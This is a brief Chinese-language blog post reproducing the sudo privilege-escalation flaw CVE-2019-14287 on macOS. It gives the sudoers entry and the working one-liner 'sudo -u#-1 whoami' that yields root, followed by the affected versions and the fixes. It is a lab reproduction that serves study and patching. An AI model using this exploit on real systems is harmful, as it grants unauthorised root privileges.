CVE-2019-14287之sudo提权复现

CVE-2019-14287漏洞复现

前言

漏洞前两天就爆出了,迫于手头有渗透测试任务没来的及复现,今天晚上跑步回来一试。。。

复现动画

asciicast

复现环境

macOS Catalina 10.15

复现过程

切换至root用户,为/etc/sudoers添加 test ALL = (ALL,!root) ALL

切换至test用户,执行sudo -u#-1 whoami

终端输出 root 或 4294967295(root的id)

漏洞影响

sudo版本<1.8.28

此漏洞的利用需要使用户具有sudo的权限

漏洞修复

  1. 升级至最新版本sudo
  2. 修改配置